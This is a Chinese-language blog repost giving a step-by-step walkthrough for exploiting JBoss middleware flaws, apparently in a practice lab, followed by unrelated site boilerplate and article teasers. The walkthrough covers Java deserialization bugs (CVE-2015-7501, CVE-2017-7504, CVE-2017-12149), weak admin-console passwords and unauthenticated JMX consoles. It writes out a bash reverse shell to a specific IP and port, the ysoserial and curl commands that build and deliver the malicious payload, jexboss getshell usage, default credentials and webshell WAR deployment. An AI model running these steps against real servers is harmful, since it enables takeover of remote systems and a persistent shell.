常見中間件漏洞攻略-Jboss篇

一、CVE-2015-7501-Jboss JMXInvokerServlet 反序列化漏洞

第一步:開啟靶場

第二步:訪問該接口,發現直接下載,說明接?開放,此接?存在反序列化漏洞

http://47.103.81.25:8080/invoker/JMXInvokerServlet
第三步:準備ysoserial?具進?漏洞利?,將反彈shell進?base64編碼

#反彈shell
bash -i >& /dev/tcp/47.103.81.25/8888 0>&1#64base編碼
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDMuODEuMjUvODg4OCAwPiYx#命令使用工具生成惡意文件
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDMuODEuMjUvODg4OCAwPiYx}|{base64,-d}|{bash,-i} ">exp.ser
第四步:服務器開啟監聽,終端執行命令,成功反彈shell

#執行命令
curl http://47.103.81.25:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

二、CVE-2017-7504-JBossMQ JMS 反序列化漏洞

第一步:開啟靶場

第二步:訪問漏洞靶場

#漏洞靶場
http://47.103.81.25:8080/jbossmq-httpil/HTTPServerILServlet
第三步:準備jexboss工具包,geshell

#運行工具,getshell
python3 jexboss.py -u http://47.103.81.25:8080

三、CVE-2017-12149-JBoss 5.x/6.x反序列化漏洞

第一步:開啟靶場

第二步:驗證是否存在漏洞

#漏洞存在地址
http://47.103.81.25:8080/invoker/readonly#響應碼500 --- 服務器內部錯誤,無法完成請求 --- 說明??存在,此??存在反序列化漏洞
#服務器將?戶post請求內容進?反序列化
第三步:使??具進?檢測 DeserializeExploit 如果成功直接上傳webshell

四、Administration Console弱?令

第一步:登陸后臺

#后臺地址
http://47.103.81.25:8080/admin-console/login.seam#用戶名密碼
admin:vulhub
第二步:點擊web應用,上傳后門文件shell.war

第三步:連接webshell

#shell.jsp地址
http://47.103.81.25:8080/shell/shell.jsp

五、低版本JMX Console未授權

第一步:開啟靶場

#URL
http://47.103.81.25:8080/jmx-console/#用戶名密碼
admin:amdin
第二步:準備通過URL的?式遠程部署war包

第三步:將后門文件war包上傳至云服務器,并測試能否順利訪問到

第四步:填寫war包地址,點擊invoke跳轉

第五步:連接webshell
#URL
http://47.103.81.25:8080/shell/shell.jsp	w

六、高版本JMX Console未授權

第一步:開啟靶場

#URL
http://47.103.81.25:8080/jmx-console/
第二步:準備通過URL的?式遠程部署war包cmd.war

第三步:連接webshell

#URL
http://47.103.81.25:8080/cmd/shell.jsp

??????????????????????????????????????????????????????????????????????????????????????????????? ????????????????????????????????FROM? IYU_?

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/899285.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/899285.shtml
英文地址,請注明出處:http://en.pswp.cn/news/899285.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

播放本地視頻-實現視頻畫廊功能

實現一個視頻畫廊,播放本地視頻 可以切換不同視頻的功能 文章目錄 需求:場景實現方案遇到的坑播放器選擇界面顯示不全視頻友好顯示問題緩存 總結 需求: 實現一個視頻畫廊,播放本地視頻 可以切換不同視頻的功能 場景 圖片畫廊的…

從零構建大語言模型全棧開發指南:第二部分:模型架構設計與實現-2.2.2文本生成邏輯:Top-k采樣與溫度控制

?? 點擊關注不迷路 ?? 點擊關注不迷路 ?? 點擊關注不迷路 文章大綱 2.2.2 文本生成邏輯:Top-k采樣與溫度控制1. 文本生成的核心挑戰與數學框架1.1 自回歸生成的基本流程2. `Top-k`采樣原理與工程實現2.1 數學定義與算法流程2.2 PyTorch實現優化3. 溫度控制的數學本質與參…

為什么后端接口返回數字類型1.00前端會取到1?

這得從axios中得默認值說起: Axios 的 transformResponse axios 在接收到服務器的響應后,會通過一系列的轉換函數(transformResponse)來處理響應數據,使其適合在應用程序中使用。默認情況下,axios 的 tran…

【C++游戲引擎開發】《線性代數》(2):矩陣加減法與SIMD集成

一、矩陣加減法數學原理 1.1 定義 ?逐元素操作:運算僅針對相同位置的元素,不涉及矩陣乘法或行列變換。?交換律與結合律: 加法滿足交換律(A + B = B + A)和結合律( ( A + B ) + C = A + ( B + C ) )。 ?減法不滿足交換律(A ? B ≠ B ? A)。1.2 公式 ? C i j = …

openGauss關聯列數據類型不一致引起謂詞傳遞失敗

今天分享一個比較有意思的案例 注意:因為原始SQL很長,為了方便排版,簡化了SQL 下面SQL跑60秒才出結果,客戶請求優化 select dtcs.owner, dtcs.table_name, dtcs.column_name, dct.commentsfrom dba_tab_columns dtcsleft outer j…

01 相機標定與相機模型介紹

學完本文,您將了解不同相機模型分類、內參意義,及對應的應用代碼模型 標定的意義 建模三維世界點投影到二維圖像平面的過程。標定輸出的是相機模型。 相機模型 相機模型可以解理解為投影模型 +

Hyperlane:Rust Web開發的未來,釋放極致性能與簡潔之美

Hyperlane:Rust Web開發的未來,釋放極致性能與簡潔之美 你是否厭倦了復雜的Web框架,想要一個既高效又易用的工具來構建現代Web應用?Hyperlane正是你需要的答案!作為專為Rust打造的輕量級、高性能HTTP服務器庫&#xf…

STM32學習筆記之振蕩器(原理篇)

📢:如果你也對機器人、人工智能感興趣,看來我們志同道合? 📢:不妨瀏覽一下我的博客主頁【https://blog.csdn.net/weixin_51244852】 📢:文章若有幸對你有幫助,可點贊 👍…

Stereolabs ZED Box Mini:機器人與自動化領域的人工智能視覺新選擇

在人工智能視覺技術快速發展的今天,其應用場景正在持續拓寬,從智能安防到工業自動化,從機器人技術到智能交通,各領域都在積極探索如何利用這一先進技術。而 Stereolabs 推出的ZED Box Mini,正是一款專為滿足這些多樣化…

K8S學習之基礎五十九:部署gitlab服務

部署gitlab docker pull gitlab/gitlab-ce:latest docker tag gitlab/gitlab-ce:latest 172.16.80.140/gitlab/gitlab-ce:latest docker push 172.16.80.140/gitlab/gitlab-ce:latest docker run -d -p 443:443 -p 80:80 -p 222:22 --name gitlab --restart always -v /home/…

多線程 --- 多線程編程

在寫代碼的時候,可以使用多進程進行并發編程(在Java中,不太推薦,很多很多關于進程相關的API,在Java標準庫中,都沒有提供),也可以使用多線程進行并發編程(系統提供了多線程…

HTML~視頻音頻在網頁中不能自動播放

問題: autoplay是打開自動播放,但是發現加了關鍵詞還是沒有反應 原因: 現在瀏覽器禁止自動播放(特別是帶聲音的) 解決辦法: 可以添加muted 進行沒有聲音的自動播放

vue中上傳接口file表單提交二進制文件流

1.使用elementui上傳組件 要做一個選擇文件后&#xff0c;先不上傳&#xff0c;等最后點擊確定后&#xff0c;把file二進制流及附加參數一起提交上去。 首先使用elementui中的上傳組件&#xff0c;設置auto-uploadfalse&#xff0c;也就是選擇文件后不立刻上傳。 <el-uplo…

Flutter環境配置

配置環境變量 PUB_HOSTED_URLhttps://pub.flutter-io.cnFLUTTER_STORAGE_BASE_URLhttps://storage.flutter-io.cn 這個命令是用來配置 Flutter 的鏡像源地址&#xff0c;主要是為了解決在中國大陸地區訪問 Flutter 官方資源較慢的問題。 具體的操作如下&#xff1a; 右鍵點…

ngx_http_index_set_index

定義在 src\http\modules\ngx_http_index_module.c static char * ngx_http_index_set_index(ngx_conf_t *cf, ngx_command_t *cmd, void *conf) {ngx_http_index_loc_conf_t *ilcf conf;ngx_str_t *value;ngx_uint_t i, n;ngx_http_inde…

數據庫的視圖有什么用?

數據庫的視圖&#xff08;View&#xff09;是一種虛擬表&#xff0c;它的內容由查詢定義&#xff0c;并不實際存儲數據&#xff0c;而是動態生成。視圖的主要作用如下&#xff1a; 1. 簡化復雜查詢 場景&#xff1a;當查詢涉及多表連接、復雜過濾或聚合操作時&#xff0c;SQL …

Ubuntu 24.04 安裝 Docker 詳細教程

前言 Docker 是目前最流行的容器化技術&#xff0c;它可以幫助開發者快速部署和運行應用程序。本文將詳細介紹在 Ubuntu 24.04 (Noble Numbat) 上安裝 Docker 的完整步驟&#xff0c;包括配置鏡像加速等實用技巧。 一、準備工作 1.1 系統要求 Ubuntu 24.04 LTS 具有 sudo 權…

鴻蒙進行視頻上傳,使用 request.uploadFile方法

一.拉起選擇器進行視頻選擇&#xff0c;并且創建文件名稱 async getPictureFromAlbum() {// 拉起相冊&#xff0c;選擇圖片let PhotoSelectOptions new photoAccessHelper.PhotoSelectOptions();PhotoSelectOptions.MIMEType photoAccessHelper.PhotoViewMIMETypes.VIDEO_TY…

C++ map容器總結

map基本概念 簡介&#xff1a; map中所有元素都是pair pair中第一個元素為key&#xff08;鍵值&#xff09;&#xff0c;起到索引作用&#xff0c;第二個元素為value&#xff08;實值&#xff09; 所有元素都會根據元素的鍵值自動排序 本質&#xff1a; map/multimap屬于關…

【Zookeeper搭建(跟練版)】Zookeeper分布式集群搭建

&#xff08;一&#xff09;克隆前的準備 1. 用 xftp 發送文件 2. 時間同步&#xff1a; sudo cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime 3. zookpeeper 安裝 部署 呼應開頭發送的壓縮包&#xff0c;解壓&#xff1a; cd ~ tar -zxvf zookeeper-3.4.6.tar.g…